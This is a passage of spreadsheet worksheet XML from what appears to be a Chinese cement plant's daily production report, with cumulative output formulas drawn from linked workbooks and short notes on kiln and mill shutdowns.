      <c r="F41" s="194">
        <f>'[12]6'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]6'!$E$16</f>
        <v>2156</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'5'!H41</f>
        <v>2156</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>127132</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]6'!$I$16</f>
        <v>465.02</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'5'!K41</f>
        <v>2236.52</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>123630.06</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]6'!$L$16</f>
        <v>26049.24</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>86.8308</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]6'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]6'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]6'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'5'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]6'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'5'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]6'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]6'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]6'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'5'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]6'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'5'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]6'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]6'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]6'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]6'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'5'!U42</f>
        <v>2592.9</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>210179.87</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]6'!$V$8</f>
        <v>812</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'5'!X42</f>
        <v>1983</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>204454</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]6'!$Y$8</f>
        <v>9088.736</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]6'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]6'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'5'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]6'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'5'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]6'!$L$14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'[12]6'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'5'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]6'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'5'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]6'!$L$15</f>
        <v>65896.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]6'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]6'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]6'!$R$29</f>
        <v>1368.84</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'5'!U44</f>
        <v>1368.84</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>66122.008</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]6'!$V$29</f>
        <v>205</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'5'!X44</f>
        <v>914</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>67324</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]6'!$Y$29</f>
        <v>2754.297</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]6'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'5'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]6'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'5'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]6'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]6'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]6'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]6'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]6'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]6'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]6'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]6'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]6'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'5'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'5'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]6'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]6'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]6'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'5'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]6'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'5'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]6'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'5'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'5'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]6'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]6'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]6'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'5'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]6'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'5'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]6'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'5'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'5'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]6'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]6'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]6'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'5'!U48</f>
        <v>300.06</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6326.59</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]6'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'5'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]6'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'5'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'5'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]6'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]6'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]6'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'5'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]6'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'5'!X49</f>
        <v>0</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>176530.34</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]6'!$Y$8</f>
        <v>10593.625</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'5'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'5'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]6'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]6'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]6'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'5'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]6'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'5'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]6'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]6'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]6'!$E$24</f>
        <v>5486.81</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'5'!H51</f>
        <v>36268.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1412667.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]6'!$I$24</f>
        <v>4405.73</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'5'!K51</f>
        <v>32196.817</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1395320.748</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]6'!$L$24</f>
        <v>52924.6769999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>117.610393333333</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]6'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]6'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]6'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'5'!U51</f>
        <v>1659.78</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>64658.251</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]6'!$V$30</f>
        <v>226</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'5'!X51</f>
        <v>1539.388</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>62155.625</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]6'!$Y$30</f>
        <v>3371.76600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]6'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]6'!$E$19</f>
        <v>2e-11</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'5'!H52</f>
        <v>1.2e-10</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1383567.25</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]6'!$I$19</f>
        <v>4808.761</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'5'!K52</f>
        <v>33922.868</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1315617.068</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]6'!$L$19</f>
        <v>71123.5750000503</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>49.050741379345</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'[13]6'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]6'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'5'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]6'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'5'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]6'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]6'!$M$21+'[14]6'!$M$22+'[14]6'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]6'!$N$21+'[14]6'!$N$22+'[14]6'!$N$35</f>
        <v>44.13</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'5'!U53</f>
        <v>263.56</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38597.987</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]6'!$Q$21+'[14]6'!$Q$22+'[14]6'!$Q$35</f>
        <v>35</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'5'!X53</f>
        <v>328</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39819</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]6'!$T$21+'[14]6'!$T$22+'[14]6'!$T$35</f>
        <v>1584.507</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]6'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'5'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]6'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'5'!K54</f>
        <v>5487.172</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>216929.022</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]6'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]6'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]6'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]6'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'5'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]6'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'5'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]6'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]6'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'5'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]6'!$I$63</f>
        <v>646.761</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'5'!K55</f>
        <v>1228.316</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>36663.966</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]6'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]6'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]6'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]6'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]6'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]6'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]6'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]6'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]6'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'5'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'5'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]6'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：9:30-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：8:00-22:10库满停机；4#磨：7:20-24:00库满停机。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G57+'5'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'5'!K57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G58+'5'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'5'!K58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G59+'5'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'5'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]6'!$Q$65</f>
        <v>窑:正常。A组磨：14:05-24:00避峰停机。D1#磨：8:00-9:00避峰停机;14:50-24:00避峰停机，D1#磨：8:00-9:00避峰停机;14:50-24:00避峰停机，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G60+'5'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'5'!K60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'[14]6'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]6'!$E$6</f>
        <v>5538</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'5'!H61</f>
        <v>20815</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1136688</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]6'!$E$21</f>
        <v>3677.33</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'5'!K61</f>
        <v>22226.51</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1123386.59</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]6'!$H$6</f>
        <v>36357.6599999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>69.9185769230767</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'[14]6'!$M$11+'[14]6'!$M$12+'[14]6'!$M$13+'[14]6'!$M$14+'[14]6'!$M$15+'[14]6'!$M$16+'[14]6'!$M$17+'[14]6'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
